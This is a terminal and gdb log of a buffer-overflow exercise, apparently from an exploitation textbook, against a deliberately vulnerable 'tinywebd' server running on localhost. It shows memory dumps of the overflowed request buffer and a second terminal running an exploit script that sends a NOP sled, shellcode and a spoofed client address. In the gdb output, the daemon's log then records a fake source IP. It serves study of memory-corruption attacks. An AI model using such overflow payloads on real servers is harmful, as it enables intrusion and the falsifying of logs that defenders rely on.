root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root 3231 0.0 0.0 2180 368 ? Ss 22:00 0:00 ./tinywebd
root 3233 0.0 0.0 5924 840 pts/0 S+ 22:00 0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -pid=3231 --symbols=./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
Attaching to process 3231
Load new symbol table from "/home/tomovic/Dokumente/hack/tinywebd"? (y or n) n
Nicht bestätigt.
(gdb) list handle_connection
77 /* This function handles the connection on the passed socket from the
78 * passed client address and logs to the passed FD. The connection is
79 * processed as a web request and this function replies over the connected
80 * socket. Finally, the passed socket is closed at the end of the function.
81 */
82 void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd) {
83 unsigned char *ptr, request[500], resource[500], log_buffer[500];
84 int fd, length;
85
86 length = recv_line(sockfd, request);
(gdb)
87
88 sprintf(log_buffer, "From %s:%d \"%s\"\t", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
89
90 ptr = strstr(request, " HTTP/"); // search for valid looking request
91 if(ptr == NULL) { // then this isn't valid HTTP
92 strcat(log_buffer, " NOT HTTP!\n");
93 } else {
94 *ptr = 0; // terminate the buffer at the end of the URL
95 ptr = NULL; // set ptr to NULL (used to flag for an invalid request)
96 if(strncmp(request, "GET ", 4) == 0) // get request
(gdb) break 86
Haltepunkt 1 at 0x8048f80: file tinywebd.c, line 86.
(gdb) break 89
Haltepunkt 2 at 0x8048fe3: file tinywebd.c, line 89.
(gdb) cont
Continuing.
Breakpoint 1, handle_connection (sockfd=5, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
86 length = recv_line(sockfd, request);
(gdb) bt
#0 handle_connection (sockfd=5, client_addr_ptr=0xbffff6f8, logfd=3) at tinywebd.c:86
#1 0x08048f73 in main () at tinywebd.c:72
(gdb) print client_addr_ptr
$1 = (struct sockaddr_in *) 0xbffff6f8
(gdb) print *client_addr_ptr
$2 = {sin_family = 2, sin_port = 16314, sin_addr = {s_addr = 16777343}, sin_zero = "\000\000\000\000\000\000\000"}
(gdb) x/x &client_addr_ptr
0xbffff6d4: 0xbffff6f8
(gdb) x/24x request + 500
0xbffff6b4: 0xb7ff2990 0xbffff6f8 0xbffff728 0xb7fc5000
0xbffff6c4: 0x00000000 0xbffff728 0x08048f73 0x00000005
0xbffff6d4: 0xbffff6f8 0x00000003 0xbffff718 0x00000004
0xbffff6e4: 0x08048990 0x00000000 0x08048711 0xb7fc53e4
0xbffff6f4: 0x00000010 0x3fba0002 0x0100007f 0x00000000
0xbffff704: 0x00000000 0x50000002 0x00000000 0x00000000
(gdb) cont
Continuing.
Breakpoint 2, handle_connection (sockfd=-1073744689, client_addr_ptr=0xbffff4cf, logfd=2560) at tinywebd.c:90
90 ptr = strstr(request, " HTTP/"); // search for valid looking request
(gdb) x/24x request + 500
0xbffff6b4: 0xbffff524 0x0000000e 0xbffff524 0xbffff524
0xbffff6c4: 0xbffff524 0xbffff524 0xbffff524 0xbffff4cf
0xbffff6d4: 0xbffff4cf 0x00000a00 0xbffff718 0x00000004
0xbffff6e4: 0x08048990 0x00000000 0x08048711 0xb7fc53e4
0xbffff6f4: 0x00000010 0x3fba0002 0x0100007f 0x00000000
0xbffff704: 0x00000000 0x50000002 0x00000000 0x00000000
(gdb) print client_addr_ptr
$3 = (struct sockaddr_in *) 0xbffff4cf
(gdb) print *client_addr_ptr
$4 = {sin_family = 2, sin_port = 33315, sin_addr = {s_addr = 1312301580}, sin_zero = "\253\205\004\b\000", <incomplete sequence \374\267>}
(gdb) x/s log_buffer
0xbffff0d8: "From 12.34.56.78:9090 \"GET / HTTP/1.1\"\t"
(gdb)
--------------Terminal 2 ----------------
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#